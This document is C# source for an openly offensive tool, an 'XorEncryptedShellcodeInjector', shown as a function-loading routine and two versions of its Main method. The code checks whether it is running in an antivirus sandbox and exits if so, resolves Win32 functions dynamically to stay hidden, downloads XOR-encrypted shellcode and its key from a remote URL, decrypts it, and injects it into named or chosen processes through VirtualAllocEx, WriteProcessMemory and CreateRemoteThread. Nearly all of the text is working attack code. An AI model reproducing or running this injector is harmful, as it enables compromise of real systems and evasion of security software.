protected override LoadLibraryResult LoadMethods() { var closeHandleResult = this.LoadMethod <CloseHandleDelegate>("CloseHandle"); if (closeHandleResult.Success) { this._closeHandle = closeHandleResult.Delegate; } else { return(new LoadLibraryResult(false, closeHandleResult.Error)); } var openProcessResult = this.LoadMethod <OpenProcessDelegate>("OpenProcess"); if (openProcessResult.Success) { this._openProcess = openProcessResult.Delegate; } else { return(new LoadLibraryResult(false, openProcessResult.Error)); } var readProcessMemoryResult = this.LoadMethod <ReadProcessMemoryDelegate>("ReadProcessMemory"); if (readProcessMemoryResult.Success) { this._readProcessMemory = readProcessMemoryResult.Delegate; } else { return(new LoadLibraryResult(false, readProcessMemoryResult.Error)); } var writeProcessMemoryResult = this.LoadMethod <WriteProcessMemoryDelegate>("WriteProcessMemory"); if (writeProcessMemoryResult.Success) { this._writeProcessMemory = writeProcessMemoryResult.Delegate; } else { return(new LoadLibraryResult(false, writeProcessMemoryResult.Error)); } return(new LoadLibraryResult(true)); }
// Main public static void Main() { // Inputs for usage Boolean RunAVEvasion = true; // Set to false to skip it int TargetPid = -1; // Set to target pid, set as -1 to use target process's name instead String TargetProcessName = ""; // Set to target process's name string KeySource = ""; // http(s) url OR plaintext OR file location of xor-decrypt key string ShellcodeSource = ""; // http(s) url OR file location, leave blank to use shellcode from array byte[] ShellcodeEncrypted = {}; // Xor-encrypted shellcode array to use ///////////////////////////////////////////// // DON't MODIFY BELOW THINGS FOR EVERYDAY USE ///////////////////////////////////////////// if (RunAVEvasion) { Console.WriteLine("Checking if running in an AV sandbox..."); if (Heuristics.IsRunningInAVSandbox()) { return; } } // Check if target process(es) is running ArrayList TargetProcesses = new ArrayList(); if (TargetPid != -1) { try { Process P = Process.GetProcessById(TargetPid); TargetProcesses.Add(P); } catch (ArgumentException) { Console.WriteLine(string.Format("No process with PID {0} exists !"), TargetPid); return; } } else { foreach (Process P in Process.GetProcessesByName(TargetProcessName)) { TargetProcesses.Add(P); } if (TargetProcesses.Count == 0) { Console.WriteLine(string.Format("No process with name '{0}' exists !", TargetProcessName)); return; } } // Arrange for the needed Win32 API funcs (D/Invoke) IntPtr OpenProcessAddr = IntPtr.Zero, VirtualAllocExAddr = IntPtr.Zero, CreateRemoteThreadAddr = IntPtr.Zero, WriteProcessMemoryAddr = IntPtr.Zero, CloseHandleAddr = IntPtr.Zero, VirtualFreeExAddr = IntPtr.Zero; if (!GetFunctionAddreses(ref OpenProcessAddr, ref VirtualAllocExAddr, ref CreateRemoteThreadAddr, ref WriteProcessMemoryAddr, ref CloseHandleAddr, ref VirtualFreeExAddr)) { Console.WriteLine("Failed to get needed function addresess"); return; } OpenProcessDelegate OpenProcess = (OpenProcessDelegate)Marshal.GetDelegateForFunctionPointer(OpenProcessAddr, typeof(OpenProcessDelegate)); VirtualAllocExDelegate VirtualAllocEx = (VirtualAllocExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocExAddr, typeof(VirtualAllocExDelegate)); CreateRemoteThreadDelegate CreateRemoteThread = (CreateRemoteThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateRemoteThreadAddr, typeof(CreateRemoteThreadDelegate)); WriteProcessMemoryDelegate WriteProcessMemory = (WriteProcessMemoryDelegate)Marshal.GetDelegateForFunctionPointer(WriteProcessMemoryAddr, typeof(WriteProcessMemoryDelegate)); CloseHandleDelegate CloseHandle = (CloseHandleDelegate)Marshal.GetDelegateForFunctionPointer(CloseHandleAddr, typeof(CloseHandleDelegate)); VirtualFreeExDelegate VirtualFreeEx = (VirtualFreeExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualFreeExAddr, typeof(VirtualFreeExDelegate)); // Show target processes Console.Write("Chosen process(es): "); foreach (Process P in TargetProcesses) { Console.Write(string.Format("{0}({1}) ", P.ProcessName, P.Id)); } Console.WriteLine(""); // Get the encrypted shellcode if (ShellcodeEncrypted.Length == 0) { try { if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://"))) { Console.Write("Downloading xor-encrypted shellcode: "); WebClient WC = new WebClient(); ShellcodeEncrypted = WC.DownloadData(ShellcodeSource); Console.Write("DONE !"); } else if (File.Exists(ShellcodeSource)) { Console.Write("Reading xor-encrypted shellcode from file: "); ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource); Console.Write("DONE !"); } else { throw new Exception(); } Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length)); } catch { Console.WriteLine("FAILED !"); return; } } // Get the decryption key byte[] DecryptionKey; try { if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://"))) { Console.Write("Fetching decryption key: "); WebClient WC = new WebClient(); DecryptionKey = WC.DownloadData(KeySource); Console.Write("DONE !"); } else if (File.Exists(KeySource)) { Console.Write("Reading decryption key from file: "); DecryptionKey = File.ReadAllBytes(KeySource); Console.Write("DONE !"); } else { Console.Write("Reading decryption key from plaintext input: "); DecryptionKey = Encoding.UTF8.GetBytes(KeySource); Console.Write("DONE !"); } Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length)); } catch { Console.WriteLine("FAILED !"); return; } // Decrypt shellcode Console.Write("Decrypting shellcode: "); IntPtr BytesWritten = IntPtr.Zero; byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length]; for (int i = 0; i < ShellcodeDecrypted.Length; i++) { ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]); } Console.WriteLine("DONE"); // Inject shellcode try { Console.WriteLine("Injecting shellcode in target process(es)..."); foreach (Process P in TargetProcesses) { Console.Write(string.Format("\t> Trying '{0}'({1}): ", P.ProcessName, P.Id)); IntPtr TargetProcessH = OpenProcess(ProcessAccessFlags.CreateThread | ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VirtualMemoryOperation | ProcessAccessFlags.VirtualMemoryRead | ProcessAccessFlags.VirtualMemoryWrite, true, P.Id); if (TargetProcessH == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0} opening handle to target process", GetLastError())); continue; } IntPtr AllocatedMemoryP = VirtualAllocEx(TargetProcessH, IntPtr.Zero, (uint)ShellcodeEncrypted.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); if (AllocatedMemoryP == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0} allocating memory in target process", GetLastError())); CloseHandle(TargetProcessH); continue; } // Inject shellcode to target process if (!WriteProcessMemory(TargetProcessH, AllocatedMemoryP, ShellcodeDecrypted, ShellcodeDecrypted.Length, out BytesWritten)) { Console.WriteLine(string.Format("Error {0} writing shellcode to process memory", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit); CloseHandle(TargetProcessH); continue; } if ((int)BytesWritten != ShellcodeDecrypted.Length) { Console.WriteLine(string.Format("Error {0} writing full shellcode to process memory", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit); CloseHandle(TargetProcessH); continue; } Console.WriteLine("DONE"); // Start execution of the shellcode Console.Write("Spawning new thread in target process: "); IntPtr NewThreadId = IntPtr.Zero; IntPtr NewThreadH = CreateRemoteThread(TargetProcessH, IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, out NewThreadId); if (NewThreadH == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0}", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release); CloseHandle(TargetProcessH); continue; } CloseHandle(NewThreadH); CloseHandle(TargetProcessH); Console.WriteLine("SUCCESS !\n\nWritten by CaptainWoof"); break; } } catch (Exception exception) { Console.WriteLine(string.Format("\n\n{0}", exception.Message)); } }
// Main public static void Main(string[] args) { // XorEncryptedShellcodeInjector <Shellcode_source> <key_to_decrypt> <pid|processname> // Help section string WholeArg = ""; for (int i = 0; i < args.Length; i++) { WholeArg += args.GetValue(i); } if (WholeArg.Contains("--help-detailed")) { PrintDetailedHelp(); return; } else if ((args.Length < 3) || WholeArg.ToLower().Contains("--help") || WholeArg.ToLower().Contains("-h")) { PrintUsage(); return; } // Check if running in AV Sandbox if (!WholeArg.Contains("--skip-av-sandbox-check")) { Console.WriteLine("Checking if running in an AV sandbox..."); if (Heuristics.IsRunningInAVSandbox()) { return; } } // Check if target process(es) is running ArrayList TargetProcesses = new ArrayList(); if (IsNumeric(args[2])) { try { Process P = Process.GetProcessById(Int32.Parse(args[2])); TargetProcesses.Add(P); } catch (ArgumentException) { Console.WriteLine(string.Format("No process with PID {0} exists !"), Int32.Parse(args[2])); return; } } else { foreach (Process P in Process.GetProcessesByName(args[2])) { TargetProcesses.Add(P); } if (TargetProcesses.Count == 0) { Console.WriteLine(string.Format("No process with name '{0}' exists !", args[2])); return; } } // Arrange for the needed Win32 API funcs (D/Invoke) IntPtr OpenProcessAddr = IntPtr.Zero, VirtualAllocExAddr = IntPtr.Zero, CreateRemoteThreadAddr = IntPtr.Zero, WriteProcessMemoryAddr = IntPtr.Zero, CloseHandleAddr = IntPtr.Zero, VirtualFreeExAddr = IntPtr.Zero; if (!GetFunctionAddreses(ref OpenProcessAddr, ref VirtualAllocExAddr, ref CreateRemoteThreadAddr, ref WriteProcessMemoryAddr, ref CloseHandleAddr, ref VirtualFreeExAddr)) { Console.WriteLine("Failed to get needed function addresess"); return; } OpenProcessDelegate OpenProcess = (OpenProcessDelegate)Marshal.GetDelegateForFunctionPointer(OpenProcessAddr, typeof(OpenProcessDelegate)); VirtualAllocExDelegate VirtualAllocEx = (VirtualAllocExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocExAddr, typeof(VirtualAllocExDelegate)); CreateRemoteThreadDelegate CreateRemoteThread = (CreateRemoteThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateRemoteThreadAddr, typeof(CreateRemoteThreadDelegate)); WriteProcessMemoryDelegate WriteProcessMemory = (WriteProcessMemoryDelegate)Marshal.GetDelegateForFunctionPointer(WriteProcessMemoryAddr, typeof(WriteProcessMemoryDelegate)); CloseHandleDelegate CloseHandle = (CloseHandleDelegate)Marshal.GetDelegateForFunctionPointer(CloseHandleAddr, typeof(CloseHandleDelegate)); VirtualFreeExDelegate VirtualFreeEx = (VirtualFreeExDelegate)Marshal.GetDelegateForFunctionPointer(VirtualFreeExAddr, typeof(VirtualFreeExDelegate)); // Parse args string KeySource = args[1]; string ShellcodeSource = args[0]; // Show target processes Console.Write("Chosen process(es): "); foreach (Process P in TargetProcesses) { Console.Write(string.Format("{0}({1}) ", P.ProcessName, P.Id)); } Console.WriteLine(""); // Get the encrypted shellcode byte[] ShellcodeEncrypted; try { if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://"))) { Console.Write("Downloading xor-encrypted shellcode: "); WebClient WC = new WebClient(); ShellcodeEncrypted = WC.DownloadData(ShellcodeSource); Console.Write("DONE !"); } else if (File.Exists(ShellcodeSource)) { Console.Write("Reading xor-encrypted shellcode from file: "); ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource); Console.Write("DONE !"); } else { Console.WriteLine("Converting xor-encrypted shellcode from base64 argument: "); ShellcodeEncrypted = Convert.FromBase64String(ShellcodeSource); Console.Write("DONE !"); } Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length)); } catch { Console.WriteLine("FAILED !"); return; } // Get the decryption key byte[] DecryptionKey; try { if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://"))) { Console.Write("Fetching decryption key: "); WebClient WC = new WebClient(); DecryptionKey = WC.DownloadData(KeySource); Console.Write("DONE !"); } else if (File.Exists(KeySource)) { Console.Write("Reading decryption key from file: "); DecryptionKey = File.ReadAllBytes(KeySource); Console.Write("DONE !"); } else { Console.Write("Reading decryption key from argument: "); DecryptionKey = Encoding.UTF8.GetBytes(KeySource); Console.Write("DONE !"); } Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length)); } catch { Console.WriteLine("FAILED !"); return; } // Decrypt shellcode Console.Write("Decrypting shellcode: "); IntPtr BytesWritten = IntPtr.Zero; byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length]; for (int i = 0; i < ShellcodeDecrypted.Length; i++) { ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]); } Console.WriteLine("DONE"); // Inject shellcode try { Console.WriteLine("Injecting shellcode in target process(es)..."); foreach (Process P in TargetProcesses) { Console.Write(string.Format("\t> Trying '{0}'({1}): ", P.ProcessName, P.Id)); IntPtr TargetProcessH = OpenProcess(ProcessAccessFlags.CreateThread | ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VirtualMemoryOperation | ProcessAccessFlags.VirtualMemoryRead | ProcessAccessFlags.VirtualMemoryWrite, true, P.Id); if (TargetProcessH == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0} opening handle to target process", GetLastError())); continue; } IntPtr AllocatedMemoryP = VirtualAllocEx(TargetProcessH, IntPtr.Zero, (uint)ShellcodeEncrypted.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); if (AllocatedMemoryP == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0} allocating memory in target process", GetLastError())); CloseHandle(TargetProcessH); continue; } // Inject shellcode to target process if (!WriteProcessMemory(TargetProcessH, AllocatedMemoryP, ShellcodeDecrypted, ShellcodeDecrypted.Length, out BytesWritten)) { Console.WriteLine(string.Format("Error {0} writing shellcode to process memory", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit); CloseHandle(TargetProcessH); continue; } if ((int)BytesWritten != ShellcodeDecrypted.Length) { Console.WriteLine(string.Format("Error {0} writing full shellcode to process memory", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release | AllocationType.Decommit); CloseHandle(TargetProcessH); continue; } Console.WriteLine("DONE"); // Start execution of the shellcode Console.Write("Spawning new thread in target process: "); IntPtr NewThreadId = IntPtr.Zero; IntPtr NewThreadH = CreateRemoteThread(TargetProcessH, IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, out NewThreadId); if (NewThreadH == IntPtr.Zero) { Console.WriteLine(string.Format("Error {0}", GetLastError())); VirtualFreeEx(TargetProcessH, AllocatedMemoryP, 0, AllocationType.Release); CloseHandle(TargetProcessH); continue; } CloseHandle(NewThreadH); CloseHandle(TargetProcessH); Console.WriteLine("SUCCESS !\n\nWritten by CaptainWoof"); break; } } catch (Exception exception) { Console.WriteLine(string.Format("\n\n{0}", exception.Message)); } }